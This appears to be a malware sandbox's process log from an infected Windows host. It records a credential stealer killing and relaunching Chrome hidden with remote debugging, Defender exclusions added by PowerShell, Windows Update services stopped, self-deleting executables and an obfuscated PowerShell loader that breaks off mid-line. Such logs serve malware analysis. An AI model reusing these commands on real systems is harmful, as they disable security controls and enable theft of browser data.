"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7640 -ip 7640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1292
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\torque.exe
"C:\Users\Admin\Desktop\Files\torque.exe"
C:\Users\Admin\Desktop\Files\14082024.exe
"C:\Users\Admin\Desktop\Files\14082024.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\stealc_valenciga.exe
"C:\Users\Admin\Desktop\Files\stealc_valenciga.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7968 -ip 7968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1300
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 12680 -s 1372
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x128,0x12c,0x130,0xf4,0x134,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\injector.exe
"C:\Users\Admin\Desktop\Files\injector.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
\??\c:\users\admin\desktop\files\injector.exe
c:\users\admin\desktop\files\injector.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4936 -ip 4936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1292
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\ldqj18tn.exe
"C:\Users\Admin\Desktop\Files\ldqj18tn.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\china.exe
"C:\Users\Admin\Desktop\Files\china.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\Files\ew.exe
"C:\Users\Admin\Desktop\Files\ew.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\Files\h5a71wdy.exe
"C:\Users\Admin\Desktop\Files\h5a71wdy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5292 -ip 5292
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rxUZSeucghvE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tkTJHfFvGhTCzu,[Parameter(Position=1)][Type]$HJxhrzqmwR)$OEMRgOedrCw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'cte'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'ss'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+'S'+[Char](101)+'aled'+[Char](44)+''+'A'+'n'+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+'C'+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$OEMRgOedrCw.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$tkTJHfFvGhTCzu).SetImplementationFlags(''+'R'+'u'+[Char](110)+'ti'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$OEMRgOedrCw.DefineMethod('In'+'v'+'o'+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'deB'+[Char](121)+'Si'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$HJxhrzqmwR,$tkTJHfFvGhTCzu).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $OEMRgOedrCw.CreateType();}$lEEpcPeWgbqjE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 